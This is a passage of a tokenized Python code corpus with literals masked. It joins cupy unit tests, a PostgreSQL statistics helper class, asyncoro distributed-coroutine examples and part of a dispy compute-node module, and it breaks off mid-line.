assertLessEqual ( self . unit_test . probabilistic_case_counter , <NUM_LIT:10> ) <EOL> self . assertGreaterEqual ( <EOL> self . unit_test . probabilistic_case_success_counter , <NUM_LIT:5> ) <EOL> self . assertLessEqual ( <EOL> self . unit_test . probabilistic_case_failure_counter , <NUM_LIT:5> ) <EOL> def test_half_of_trials_succeed2 ( self ) : <EOL> f = self . _decorate ( MockUnitTest . probabilistic_case , <NUM_LIT:10> , <NUM_LIT:6> ) <EOL> _should_fail ( self , f ) <EOL> self . assertLessEqual ( self . unit_test . probabilistic_case_counter , <NUM_LIT:10> ) <EOL> self . assertLess ( <EOL> self . unit_test . probabilistic_case_success_counter , <NUM_LIT:6> ) <EOL> self . assertGreaterEqual ( <EOL> self . unit_test . probabilistic_case_failure_counter , <NUM_LIT:5> ) <EOL> class TestRepeat ( unittest . TestCase ) : <EOL> def _decorate ( self , f , times ) : <EOL> return condition . repeat ( times ) ( f ) <EOL> def setUp ( self ) : <EOL> self . unit_test = MockUnitTest ( ) <EOL> def test_failure_case ( self ) : <EOL> f = self . 
_decorate ( MockUnitTest . failure_case , <NUM_LIT:10> ) <EOL> _should_fail ( self , f ) <EOL> self . assertLessEqual ( self . unit_test . failure_case_counter , <NUM_LIT:10> ) <EOL> def test_success_case ( self ) : <EOL> f = self . _decorate ( MockUnitTest . success_case , <NUM_LIT:10> ) <EOL> _should_pass ( self , f ) <EOL> self . assertEqual ( self . unit_test . success_case_counter , <NUM_LIT:10> ) <EOL> def test_probabilistic_case ( self ) : <EOL> f = self . _decorate ( MockUnitTest . probabilistic_case , <NUM_LIT:10> ) <EOL> _should_fail ( self , f ) <EOL> self . assertLessEqual ( self . unit_test . probabilistic_case_counter , <NUM_LIT:10> ) <EOL> self . assertLess ( self . unit_test . probabilistic_case_success_counter , <NUM_LIT:10> ) <EOL> self . assertGreater ( <EOL> self . unit_test . probabilistic_case_failure_counter , <NUM_LIT:0> ) <EOL> class TestRetry ( unittest . TestCase ) : <EOL> def _decorate ( self , f , times ) : <EOL> return condition . retry ( times ) ( f ) <EOL> def setUp ( self ) : <EOL> self . unit_test = MockUnitTest ( ) <EOL> def test_failure_case ( self ) : <EOL> f = self . _decorate ( MockUnitTest . failure_case , <NUM_LIT:10> ) <EOL> _should_fail ( self , f ) <EOL> self . assertEqual ( self . unit_test . failure_case_counter , <NUM_LIT:10> ) <EOL> def test_success_case ( self ) : <EOL> f = self . _decorate ( MockUnitTest . success_case , <NUM_LIT:10> ) <EOL> _should_pass ( self , f ) <EOL> self . assertLessEqual ( self . unit_test . success_case_counter , <NUM_LIT:10> ) <EOL> def test_probabilistic_case ( self ) : <EOL> f = self . _decorate ( MockUnitTest . probabilistic_case , <NUM_LIT:10> ) <EOL> _should_pass ( self , f ) <EOL> self . assertLessEqual ( <EOL> self . unit_test . probabilistic_case_counter , <NUM_LIT:10> ) <EOL> self . assertGreater ( <EOL> self . unit_test . probabilistic_case_success_counter , <NUM_LIT:0> ) <EOL> self . assertLess ( self . unit_test . 
probabilistic_case_failure_counter , <NUM_LIT:10> ) <EOL> testing . run_module ( __name__ , __file__ ) </s>
<s> import unittest <EOL> import numpy <EOL> import cupy <EOL> from cupy . cuda import curand <EOL> class TestGenerateNormal ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . generator = curand . createGenerator ( <EOL> curand . CURAND_RNG_PSEUDO_DEFAULT ) <EOL> def test_invalid_argument_normal_float ( self ) : <EOL> out = cupy . empty ( ( <NUM_LIT:1> , ) , dtype = numpy . float32 ) <EOL> with self . assertRaises ( ValueError ) : <EOL> curand . generateNormal ( <EOL> self . generator , out . data . ptr , <NUM_LIT:1> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ) <EOL> def test_invalid_argument_normal_double ( self ) : <EOL> out = cupy . empty ( ( <NUM_LIT:1> , ) , dtype = numpy . float64 ) <EOL> with self . assertRaises ( ValueError ) : <EOL> curand . generateNormalDouble ( <EOL> self . generator , out . data . ptr , <NUM_LIT:1> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ) <EOL> def test_invalid_argument_log_normal_float ( self ) : <EOL> out = cupy . empty ( ( <NUM_LIT:1> , ) , dtype = numpy . float32 ) <EOL> with self . assertRaises ( ValueError ) : <EOL> curand . generateLogNormal ( <EOL> self . generator , out . data . ptr , <NUM_LIT:1> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ) <EOL> def test_invalid_argument_log_normal_double ( self ) : <EOL> out = cupy . empty ( ( <NUM_LIT:1> , ) , dtype = numpy . float64 ) <EOL> with self . assertRaises ( ValueError ) : <EOL> curand . generateLogNormalDouble ( <EOL> self . generator , out . data . ptr , <NUM_LIT:1> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ) </s>
<s> import unittest <EOL> import cupy <EOL> from cupy import testing <EOL> @ testing . gpu <EOL> class TestTranspose ( unittest . TestCase ) : <EOL> _multiprocess_can_split_ = True <EOL> @ testing . numpy_cupy_array_equal ( ) <EOL> def test_rollaxis ( self , xp ) : <EOL> a = testing . shaped_arange ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) , xp ) <EOL> return xp . rollaxis ( a , <NUM_LIT:2> ) <EOL> def test_rollaxis_failure ( self ) : <EOL> a = testing . shaped_arange ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> with self . assertRaises ( ValueError ) : <EOL> cupy . rollaxis ( a , <NUM_LIT:3> ) <EOL> @ testing . numpy_cupy_array_equal ( ) <EOL> def test_swapaxes ( self , xp ) : <EOL> a = testing . shaped_arange ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) , xp ) <EOL> return xp . swapaxes ( a , <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> def test_swapaxes_failure ( self ) : <EOL> a = testing . shaped_arange ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> with self . assertRaises ( ValueError ) : <EOL> cupy . swapaxes ( a , <NUM_LIT:3> , <NUM_LIT:0> ) <EOL> @ testing . numpy_cupy_array_equal ( ) <EOL> def test_transpose ( self , xp ) : <EOL> a = testing . shaped_arange ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) , xp ) <EOL> return a . transpose ( - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> @ testing . numpy_cupy_array_equal ( ) <EOL> def test_transpose_empty ( self , xp ) : <EOL> a = testing . shaped_arange ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) , xp ) <EOL> return a . transpose ( ) <EOL> @ testing . numpy_cupy_array_equal ( ) <EOL> def test_transpose_none ( self , xp ) : <EOL> a = testing . shaped_arange ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) , xp ) <EOL> return a . transpose ( None ) <EOL> @ testing . numpy_cupy_array_equal ( ) <EOL> def test_external_transpose ( self , xp ) : <EOL> a = testing . shaped_arange ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) , xp ) <EOL> return xp . 
transpose ( a , ( - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> @ testing . numpy_cupy_array_equal ( ) <EOL> def test_external_transpose_all ( self , xp ) : <EOL> a = testing . shaped_arange ( ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ) , xp ) <EOL> return xp . transpose ( a ) </s>
<s> import logging <EOL> logger = logging . getLogger ( __name__ ) <EOL> class PostgresInformation ( ) : <EOL> def __init__ ( self , db ) : <EOL> self . db = db <EOL> def relations ( self , with_views ) : <EOL> query = """<STR_LIT>""" % ( "<STR_LIT>" if with_views else "<STR_LIT>" ) <EOL> result = self . db . run_query ( query ) <EOL> return result <EOL> def columns ( self , with_views ) : <EOL> query = """<STR_LIT>""" % ( "<STR_LIT>" if with_views else "<STR_LIT>" ) <EOL> result = self . db . run_query ( query ) <EOL> return result <EOL> def indexes ( self , with_views ) : <EOL> query = """<STR_LIT>""" % ( "<STR_LIT>" if with_views else "<STR_LIT>" ) <EOL> result = self . db . run_query ( query ) <EOL> for row in result : <EOL> row [ '<STR_LIT>' ] = map ( int , str ( row [ '<STR_LIT>' ] ) . split ( ) ) <EOL> return result <EOL> def constraints ( self ) : <EOL> query = """<STR_LIT>""" <EOL> return self . db . run_query ( query ) <EOL> def view_definitions ( self ) : <EOL> query = """<STR_LIT>""" <EOL> return self . db . run_query ( query ) <EOL> def triggers ( self ) : <EOL> query = """<STR_LIT>""" <EOL> def version ( self ) : <EOL> return self . db . run_query ( "<STR_LIT>" ) [ <NUM_LIT:0> ] [ '<STR_LIT:version>' ] <EOL> def table_bloat ( self ) : <EOL> query = """<STR_LIT>""" <EOL> return self . db . run_query ( query ) <EOL> def index_bloat ( self ) : <EOL> query = """<STR_LIT>""" <EOL> return self . db . run_query ( query ) <EOL> def bgwriter_stats ( self ) : <EOL> query = "<STR_LIT>" <EOL> return self . db . run_query ( query ) <EOL> def db_stats ( self ) : <EOL> query = "<STR_LIT>" <EOL> return self . db . run_query ( query ) <EOL> def server_stats ( self ) : <EOL> query = """<STR_LIT>""" <EOL> return self . db . run_query ( query ) <EOL> def settings ( self ) : <EOL> query = "<STR_LIT>" <EOL> result = self . db . run_query ( query ) <EOL> for row in result : <EOL> row [ '<STR_LIT>' ] = row . pop ( '<STR_LIT>' ) <EOL> row [ '<STR_LIT>' ] = row . 
pop ( '<STR_LIT>' ) <EOL> row [ '<STR_LIT>' ] = row . pop ( '<STR_LIT>' ) <EOL> return result <EOL> def have_stat_activity_helper ( self ) : <EOL> query = """<STR_LIT>""" <EOL> return self . db . run_query ( query ) == [ { "<STR_LIT>" : <NUM_LIT:1> } ] <EOL> def backends ( self ) : <EOL> query = """<STR_LIT>""" <EOL> if self . have_stat_activity_helper ( ) : <EOL> query += "<STR_LIT>" <EOL> else : <EOL> query += "<STR_LIT>" <EOL> query += "<STR_LIT>" <EOL> return self . db . run_query ( query ) <EOL> def replication ( self ) : <EOL> query = """<STR_LIT>""" <EOL> return self . db . run_query ( query ) <EOL> def replication_conflicts ( self ) : <EOL> query = """<STR_LIT>""" <EOL> return self . db . run_query ( query ) <EOL> def locks ( self ) : <EOL> query = """<STR_LIT>""" <EOL> return self . db . run_query ( query ) <EOL> def functions ( self ) : <EOL> query = """<STR_LIT>""" <EOL> return self . db . run_query ( query ) </s>
<s> import asyncoro . disasyncoro as asyncoro <EOL> from asyncoro . discoro import * <EOL> from asyncoro . discoro_schedulers import RemoteCoroScheduler <EOL> def rcoro_avg_proc ( threshold , trend_coro , window_size , coro = None ) : <EOL> import numpy as np <EOL> data = np . empty ( window_size , dtype = float ) <EOL> data . fill ( <NUM_LIT:0.0> ) <EOL> cumsum = <NUM_LIT:0.0> <EOL> while True : <EOL> i , n = yield coro . receive ( ) <EOL> if n is None : <EOL> break <EOL> cumsum += ( n - data [ <NUM_LIT:0> ] ) <EOL> avg = cumsum / window_size <EOL> if avg > threshold : <EOL> trend_coro . send ( ( i , '<STR_LIT>' , float ( avg ) ) ) <EOL> elif avg < - threshold : <EOL> trend_coro . send ( ( i , '<STR_LIT>' , float ( avg ) ) ) <EOL> data = np . roll ( data , - <NUM_LIT:1> ) <EOL> data [ - <NUM_LIT:1> ] = n <EOL> raise StopIteration ( <NUM_LIT:0> ) <EOL> def rcoro_save_proc ( coro = None ) : <EOL> import os <EOL> import tempfile <EOL> with open ( os . path . join ( os . sep , tempfile . gettempdir ( ) , '<STR_LIT>' ) , '<STR_LIT:w>' ) as fd : <EOL> while True : <EOL> i , n = yield coro . receive ( ) <EOL> if n is None : <EOL> break <EOL> fd . write ( '<STR_LIT>' % ( i , n ) ) <EOL> raise StopIteration ( <NUM_LIT:0> ) <EOL> def trend_proc ( coro = None ) : <EOL> coro . set_daemon ( ) <EOL> while True : <EOL> trend = yield coro . receive ( ) <EOL> print ( '<STR_LIT>' % ( trend [ <NUM_LIT:0> ] , trend [ <NUM_LIT:1> ] , trend [ <NUM_LIT:2> ] ) ) <EOL> def client_proc ( computation , coro = None ) : <EOL> if ( yield computation . schedule ( ) ) : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> trend_coro = asyncoro . Coro ( trend_proc ) <EOL> rcoro_avg = yield rcoro_scheduler . schedule ( rcoro_avg_proc , <NUM_LIT> , trend_coro , <NUM_LIT:10> ) <EOL> assert isinstance ( rcoro_avg , asyncoro . Coro ) <EOL> rcoro_save = yield rcoro_scheduler . schedule ( rcoro_save_proc ) <EOL> assert isinstance ( rcoro_save , asyncoro . Coro ) <EOL> yield asyncoro . AsynCoro . instance ( ) . 
peer ( rcoro_avg . location , stream_send = True ) <EOL> yield asyncoro . AsynCoro . instance ( ) . peer ( rcoro_save . location , stream_send = True ) <EOL> for i in range ( <NUM_LIT:1000> ) : <EOL> n = random . uniform ( - <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> item = ( i , n ) <EOL> rcoro_avg . send ( item ) <EOL> rcoro_save . send ( item ) <EOL> yield coro . sleep ( <NUM_LIT> ) <EOL> item = ( i , None ) <EOL> rcoro_avg . send ( item ) <EOL> rcoro_save . send ( item ) <EOL> yield rcoro_scheduler . finish ( close = True ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import logging , random <EOL> asyncoro . logger . setLevel ( logging . DEBUG ) <EOL> Scheduler ( ) <EOL> computation = Computation ( [ ] ) <EOL> rcoro_scheduler = RemoteCoroScheduler ( computation ) <EOL> asyncoro . Coro ( client_proc , computation ) </s>
<s> import sys , socket <EOL> import asyncoro <EOL> def server_proc ( n , sock , coro = None ) : <EOL> for i in range ( n ) : <EOL> msg , addr = yield sock . recvfrom ( <NUM_LIT> ) <EOL> print ( '<STR_LIT>' % ( msg , addr [ <NUM_LIT:0> ] , addr [ <NUM_LIT:1> ] ) ) <EOL> sock . close ( ) <EOL> def client_proc ( host , port , coro = None ) : <EOL> sock = asyncoro . AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_DGRAM ) ) <EOL> msg = '<STR_LIT>' % ( sock . fileno ( ) ) <EOL> if sys . version_info . major >= <NUM_LIT:3> : <EOL> msg = bytes ( msg , '<STR_LIT:ascii>' ) <EOL> yield sock . sendto ( msg , ( host , port ) ) <EOL> sock . close ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sock = asyncoro . AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_DGRAM ) ) <EOL> sock . bind ( ( '<STR_LIT:127.0.0.1>' , <NUM_LIT:0> ) ) <EOL> host , port = sock . getsockname ( ) <EOL> n = <NUM_LIT:50> <EOL> server_coro = asyncoro . Coro ( server_proc , n , sock ) <EOL> for i in range ( n ) : <EOL> asyncoro . Coro ( client_proc , host , port ) <EOL> server_coro . value ( ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = "<STR_LIT>" <EOL> __email__ = "<STR_LIT>" <EOL> __copyright__ = "<STR_LIT>" <EOL> __contributors__ = [ ] <EOL> __maintainer__ = "<STR_LIT>" <EOL> __license__ = "<STR_LIT>" <EOL> __url__ = "<STR_LIT>" <EOL> __status__ = "<STR_LIT>" <EOL> import os <EOL> import sys <EOL> import time <EOL> import stat <EOL> import socket <EOL> import multiprocessing <EOL> import threading <EOL> import subprocess <EOL> import traceback <EOL> import logging <EOL> import marshal <EOL> import tempfile <EOL> import shutil <EOL> import glob <EOL> import functools <EOL> import inspect <EOL> import pickle <EOL> import io <EOL> try : <EOL> import psutil <EOL> except ImportError : <EOL> psutil = None <EOL> from dispy import _JobReply , DispyJob , DispyNodeAvailInfo , _Function , _Compute , _XferFile , _node_ipaddr , _dispy_version , auth_code , num_min , _same_file , MsgTimeout <EOL> import asyncoro <EOL> from asyncoro import Coro , AsynCoro , AsyncSocket , serialize , unserialize <EOL> __version__ = _dispy_version <EOL> __all__ = [ ] <EOL> MaxFileSize = <NUM_LIT:0> <EOL> def dispy_provisional_result ( result , timeout = MsgTimeout ) : <EOL> """<STR_LIT>""" <EOL> dispy_job_reply = __dispy_job_info . job_reply <EOL> dispy_job_reply . status = DispyJob . ProvisionalResult <EOL> dispy_job_reply . result = result <EOL> dispy_job_reply . end_time = time . time ( ) <EOL> sock = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> sock = AsyncSocket ( sock , blocking = True , keyfile = __dispy_job_keyfile , <EOL> certfile = __dispy_job_certfile ) <EOL> sock . settimeout ( timeout ) <EOL> try : <EOL> sock . connect ( __dispy_job_info . reply_addr ) <EOL> sock . send_msg ( b'<STR_LIT>' + serialize ( dispy_job_reply ) ) <EOL> ack = sock . recv_msg ( ) <EOL> assert ack == b'<STR_LIT>' <EOL> except : <EOL> print ( "<STR_LIT>" % ( str ( result ) , traceback . 
format_exc ( ) ) ) <EOL> return - <NUM_LIT:1> <EOL> else : <EOL> return <NUM_LIT:0> <EOL> finally : <EOL> sock . close ( ) <EOL> def dispy_send_file ( path , timeout = MsgTimeout ) : <EOL> """<STR_LIT>""" <EOL> path = os . path . expanduser ( path ) <EOL> xf = _XferFile ( path , os . stat ( path ) ) <EOL> if MaxFileSize and xf . stat_buf . st_size > MaxFileSize : <EOL> return - <NUM_LIT:1> <EOL> xf . name = os . path . splitdrive ( path ) [ <NUM_LIT:1> ] <EOL> if xf . name . startswith ( os . sep ) : <EOL> xf . name = xf . name [ len ( os . sep ) : ] <EOL> dispy_job_reply = __dispy_job_info . job_reply <EOL> sock = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> sock = AsyncSocket ( sock , blocking = True , <EOL> keyfile = __dispy_job_keyfile , certfile = __dispy_job_certfile ) <EOL> sock . settimeout ( timeout ) <EOL> try : <EOL> sock . connect ( __dispy_job_info . reply_addr ) <EOL> sock . send_msg ( '<STR_LIT>' . encode ( ) + serialize ( xf ) ) <EOL> sock . send_msg ( serialize ( dispy_job_reply ) ) <EOL> recvd = sock . recv_msg ( ) <EOL> recvd = unserialize ( recvd ) <EOL> fd = open ( path , '<STR_LIT:rb>' ) <EOL> sent = <NUM_LIT:0> <EOL> while sent == recvd : <EOL> data = fd . read ( <NUM_LIT> ) <EOL> if not data : <EOL> break <EOL> sock . sendall ( data ) <EOL> sent += len ( data ) <EOL> recvd = sock . recv_msg ( ) <EOL> recvd = unserialize ( recvd ) <EOL> fd . close ( ) <EOL> assert recvd == xf . stat_buf . st_size <EOL> except : <EOL> print ( '<STR_LIT>' % ( path , traceback . format_exc ( ) ) ) <EOL> return - <NUM_LIT:1> <EOL> else : <EOL> return <NUM_LIT:0> <EOL> finally : <EOL> sock . close ( ) <EOL> class _DispyJobInfo ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , job_reply , reply_addr , compute , xfer_files ) : <EOL> self . job_reply = job_reply <EOL> self . reply_addr = reply_addr <EOL> self . compute_id = compute . id <EOL> self . compute_dest_path = compute . dest_path <EOL> self . 
xfer_files = xfer_files <EOL> self . compute_auth = compute . auth <EOL> self . proc = None <EOL> def _dispy_job_func ( __dispy_job_info , __dispy_job_certfile , __dispy_job_keyfile , <EOL> __dispy_job_name , __dispy_job_args , __dispy_job_kwargs , <EOL> __dispy_job_code , __dispy_job_globals , __dispy_path , __dispy_reply_Q ) : <EOL> """<STR_LIT>""" <EOL> os . chdir ( __dispy_path ) <EOL> sys . stdout = io . StringIO ( ) <EOL> sys . stderr = io . StringIO ( ) <EOL> __dispy_job_reply = __dispy_job_info . job_reply <EOL> globals ( ) . update ( __dispy_job_globals ) <EOL> try : <EOL> exec ( marshal . loads ( __dispy_job_code [ <NUM_LIT:0> ] ) , globals ( ) ) <EOL> if __dispy_job_code [ <NUM_LIT:1> ] : <EOL> exec ( __dispy_job_code [ <NUM_LIT:1> ] , globals ( ) ) <EOL> if __name__ == '<STR_LIT>' : <EOL> sys . modules [ '<STR_LIT>' ] . __dict__ . update ( globals ( ) ) <EOL> __dispy_job_args = unserialize ( __dispy_job_args ) <EOL> __dispy_job_kwargs = unserialize ( __dispy_job_kwargs ) <EOL> globals ( ) . update ( locals ( ) ) <EOL> exec ( '<STR_LIT>' % <EOL> __dispy_job_name , globals ( ) ) <EOL> __dispy_job_reply . status = DispyJob . Finished <EOL> except : <EOL> __dispy_job_reply . exception = traceback . format_exc ( ) <EOL> __dispy_job_reply . status = DispyJob . Terminated <EOL> __dispy_job_reply . stdout = sys . stdout . getvalue ( ) <EOL> __dispy_job_reply . stderr = sys . stderr . getvalue ( ) <EOL> __dispy_job_reply . end_time = time . time ( ) <EOL> __dispy_job_info . proc = None <EOL> __dispy_reply_Q . 
put ( __dispy_job_reply ) <EOL> class _DispyNode ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , cpus , ip_addr = None , ext_ip_addr = None , node_port = None , <EOL> name = '<STR_LIT>' , scheduler_node = None , scheduler_port = None , <EOL> dest_path_prefix = '<STR_LIT>' , clean = False , secret = '<STR_LIT>' , keyfile = None , certfile = None , <EOL> zombie_interval = <NUM_LIT> , service_start = None , service_stop = None , service_end = None , <EOL> serve = - <NUM_LIT:1> , daemon = False ) : <EOL> assert <NUM_LIT:0> < cpus <= multiprocessing . cpu_count ( ) <EOL> self . num_cpus = cpus <EOL> if name : <EOL> self . name = name <EOL> else : <EOL> self . name = socket . gethostname ( ) <EOL> if ip_addr : <EOL> ip_addr = _node_ipaddr ( ip_addr ) <EOL> if not ip_addr : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> else : <EOL> ip_addr = socket . gethostbyname ( socket . gethostname ( ) ) <EOL> if ip_addr . startswith ( '<STR_LIT>' ) : <EOL> _dispy_logger . warning ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , ip_addr ) <EOL> if ext_ip_addr : <EOL> ext_ip_addr = _node_ipaddr ( ext_ip_addr ) <EOL> if not ext_ip_addr : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> else : <EOL> ext_ip_addr = ip_addr <EOL> if not self . name : <EOL> try : <EOL> self . name = socket . gethostbyaddr ( ext_ip_addr ) [ <NUM_LIT:0> ] <EOL> except : <EOL> self . name = '<STR_LIT>' <EOL> if node_port is None : <EOL> node_port = <NUM_LIT> <EOL> self . ext_ip_addr = ext_ip_addr <EOL> self . pulse_interval = None <EOL> self . keyfile = keyfile <EOL> self . certfile = certfile <EOL> if self . keyfile : <EOL> self . keyfile = os . path . abspath ( self . keyfile ) <EOL> if self . certfile : <EOL> self . certfile = os . path . abspath ( self . certfile ) <EOL> self . asyncoro = AsynCoro ( ) <EOL> self . tcp_sock = AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) , <EOL> keyfile = keyfile , certfile = certfile ) <EOL> self . tcp_sock . setsockopt ( socket . 
SOL_SOCKET , socket . SO_REUSEADDR , <NUM_LIT:1> ) <EOL> self . tcp_sock . bind ( ( ip_addr , node_port ) ) <EOL> self . address = self . tcp_sock . getsockname ( ) <EOL> self . port = self . address [ <NUM_LIT:1> ] <EOL> self . tcp_sock . listen ( <NUM_LIT:30> ) <EOL> if not dest_path_prefix : <EOL> dest_path_prefix = os . path . join ( tempfile . gettempdir ( ) , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . dest_path_prefix = os . path . abspath ( dest_path_prefix . strip ( ) ) . rstrip ( os . sep ) <EOL> if clean : <EOL> shutil . rmtree ( self . dest_path_prefix , ignore_errors = True ) <EOL> if not os . path . isdir ( self . dest_path_prefix ) : <EOL> os . makedirs ( self . dest_path_prefix ) <EOL> os . chmod ( self . dest_path_prefix , stat . S_IRUSR | stat . S_IWUSR | stat . S_IXUSR ) <EOL> self . avail_cpus = self . num_cpus <EOL> self . computations = { } <EOL> self . job_infos = { } <EOL> self . terminate = False <EOL> self . sign = '<STR_LIT>' . join ( hex ( x ) [ <NUM_LIT:2> : ] for x in os . urandom ( <NUM_LIT:10> ) ) <EOL> self . secret = secret <EOL> self . auth = auth_code ( self . secret , self . sign ) <EOL> self . zombie_interval = <NUM_LIT> * zombie_interval <EOL> if not scheduler_port : <EOL> scheduler_port = <NUM_LIT> <EOL> self . scheduler = { '<STR_LIT>' : None , '<STR_LIT:port>' : scheduler_port , '<STR_LIT>' : set ( ) } <EOL> self . cpu_time = <NUM_LIT:0> <EOL> self . num_jobs = <NUM_LIT:0> <EOL> self . num_computations = <NUM_LIT:0> <EOL> fd = open ( os . path . join ( self . dest_path_prefix , '<STR_LIT>' ) , '<STR_LIT:wb>' ) <EOL> config = { <EOL> '<STR_LIT>' : self . ext_ip_addr , '<STR_LIT:port>' : self . port , '<STR_LIT>' : self . avail_cpus , <EOL> '<STR_LIT>' : self . sign , '<STR_LIT>' : self . secret , '<STR_LIT>' : self . auth <EOL> } <EOL> pickle . dump ( config , fd ) <EOL> fd . close ( ) <EOL> sys . path . insert ( <NUM_LIT:0> , '<STR_LIT:.>' ) <EOL> proc = multiprocessing . Process ( target = functools . 
partial ( int ) , args = ( <NUM_LIT> , ) ) <EOL> proc . start ( ) <EOL> proc . join ( ) <EOL> self . thread_lock = threading . Lock ( ) <EOL> self . udp_sock = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM ) <EOL> self . udp_sock . setsockopt ( socket . SOL_SOCKET , socket . SO_REUSEADDR , <NUM_LIT:1> ) <EOL> self . udp_sock . bind ( ( '<STR_LIT>' , self . port ) ) <EOL> _dispy_logger . info ( '<STR_LIT>' , <EOL> self . num_cpus , self . ext_ip_addr , self . port ) <EOL> _dispy_logger . debug ( '<STR_LIT>' , self . address [ <NUM_LIT:0> ] , self . address [ <NUM_LIT:1> ] ) <EOL> self . udp_sock = AsyncSocket ( self . udp_sock ) <EOL> self . reply_Q = multiprocessing . Queue ( ) <EOL> self . reply_Q_thread = threading . Thread ( target = self . __reply_Q ) <EOL> self . reply_Q_thread . start ( ) <EOL> self . serve = serve <EOL> self . timer_coro = Coro ( self . timer_task ) <EOL> self . service_start = self . service_stop = self . service_end = None <EOL> if isinstance ( service_start , time . struct_time ) and ( isinstance ( service_stop , time . struct_time ) or <EOL> isinstance ( service_end , time . struct_time ) ) : <EOL> self . service_start = ( service_start . tm_hour , service_start . tm_min ) <EOL> if isinstance ( service_stop , time . struct_time ) : <EOL> self . service_stop = ( service_stop . tm_hour , service_stop . tm_min ) <EOL> if isinstance ( service_end , time . struct_time ) : <EOL> self . service_end = ( service_end . tm_hour , service_end . tm_min ) <EOL> Coro ( self . service_schedule ) <EOL> self . __init_code = '<STR_LIT>' . join ( inspect . getsource ( dispy_provisional_result ) ) <EOL> self . __init_code += '<STR_LIT>' . join ( inspect . getsource ( dispy_send_file ) ) <EOL> self . __init_modules = dict ( sys . modules ) <EOL> if os . name == '<STR_LIT>' : <EOL> self . __init_globals = dict ( globals ( ) ) <EOL> self . tcp_coro = Coro ( self . tcp_server ) <EOL> self . udp_coro = Coro ( self . 
udp_server , _node_ipaddr ( scheduler_node ) , scheduler_port ) <EOL> if not daemon : <EOL> Coro ( self . read_stdin ) <EOL> def broadcast_ping_msg ( self , coro = None ) : <EOL> if ( self . scheduler [ '<STR_LIT>' ] or self . job_infos or not self . avail_cpus or <EOL> not self . service_available ( ) ) : <EOL> raise StopIteration <EOL> sock = socket . socket ( socket . AF_INET , socket . SOCK_DGRAM ) <EOL> sock . setsockopt ( socket . SOL_SOCKET , socket . SO_BROADCAST , <NUM_LIT:1> ) <EOL> sock = AsyncSocket ( sock ) <EOL> sock . settimeout ( MsgTimeout ) <EOL> ping_msg = { '<STR_LIT>' : self . ext_ip_addr , '<STR_LIT:port>' : self . port , '<STR_LIT>' : self . sign , <EOL> '<STR_LIT:version>' : _dispy_version , '<STR_LIT>' : None } <EOL> try : <EOL> yield sock . sendto ( '<STR_LIT>' . encode ( ) + serialize ( ping_msg ) , <EOL> ( '<STR_LIT>' , self . scheduler [ '<STR_LIT:port>' ] ) ) <EOL> except : <EOL> _dispy_logger . debug ( traceback . format_exc ( ) ) <EOL> pass <EOL> sock . close ( ) <EOL> def send_pong_msg ( self , info , addr , coro = None ) : <EOL> if ( self . scheduler [ '<STR_LIT>' ] or self . job_infos or not self . num_cpus or <EOL> not self . service_available ( ) ) : <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> self . avail_cpus , self . num_cpus , addr [ <NUM_LIT:0> ] ) <EOL> raise StopIteration <EOL> try : <EOL> scheduler_ip_addrs = info [ '<STR_LIT>' ] <EOL> if not info . get ( '<STR_LIT>' , None ) : <EOL> scheduler_ip_addrs . append ( addr [ <NUM_LIT:0> ] ) <EOL> scheduler_port = info [ '<STR_LIT:port>' ] <EOL> except : <EOL> _dispy_logger . debug ( traceback . format_exc ( ) ) <EOL> raise StopIteration <EOL> if info . get ( '<STR_LIT>' , None ) : <EOL> pong_msg = { '<STR_LIT>' : self . ext_ip_addr , '<STR_LIT:port>' : self . port , '<STR_LIT>' : self . sign , <EOL> '<STR_LIT:version>' : _dispy_version , '<STR_LIT:name>' : self . name , '<STR_LIT>' : self . avail_cpus , <EOL> '<STR_LIT>' : auth_code ( self . 
